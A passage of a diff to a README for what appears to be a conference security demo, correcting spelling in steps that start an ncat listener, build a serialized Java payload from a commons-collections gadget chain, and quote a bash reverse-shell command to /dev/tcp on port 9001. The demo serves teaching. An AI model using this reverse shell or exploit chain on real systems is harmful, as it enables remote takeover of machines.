bmvermeer/DevNexus2022/README.md

 ```

 ### 4c Launch netcat
-In a new terminal window launch netcat listening to port 9001
+In a new terminal window launch Netcat listening to port 9001
 ```
 ncat -lvp 9001
 ```

 ### 4d launch the attack
-The exploit server will create serialize java payload containing a gadget chain that is available in the outdated apache `commons-collections` library.
+The exploit server will create a serialized java payload containing a gadget chain from the outdated Apache `commons-collections` library.
 This payload will try to execute following statement to create a reversed shell: `"$@| bash -i >& /dev/tcp/host.docker.internal/9001 0>&1"`

-From your docker container connect tot the LDAP server on you local machine
+From your Docker container, connect to the LDAP server on your local machine

 Use below as the username with any given password
 ```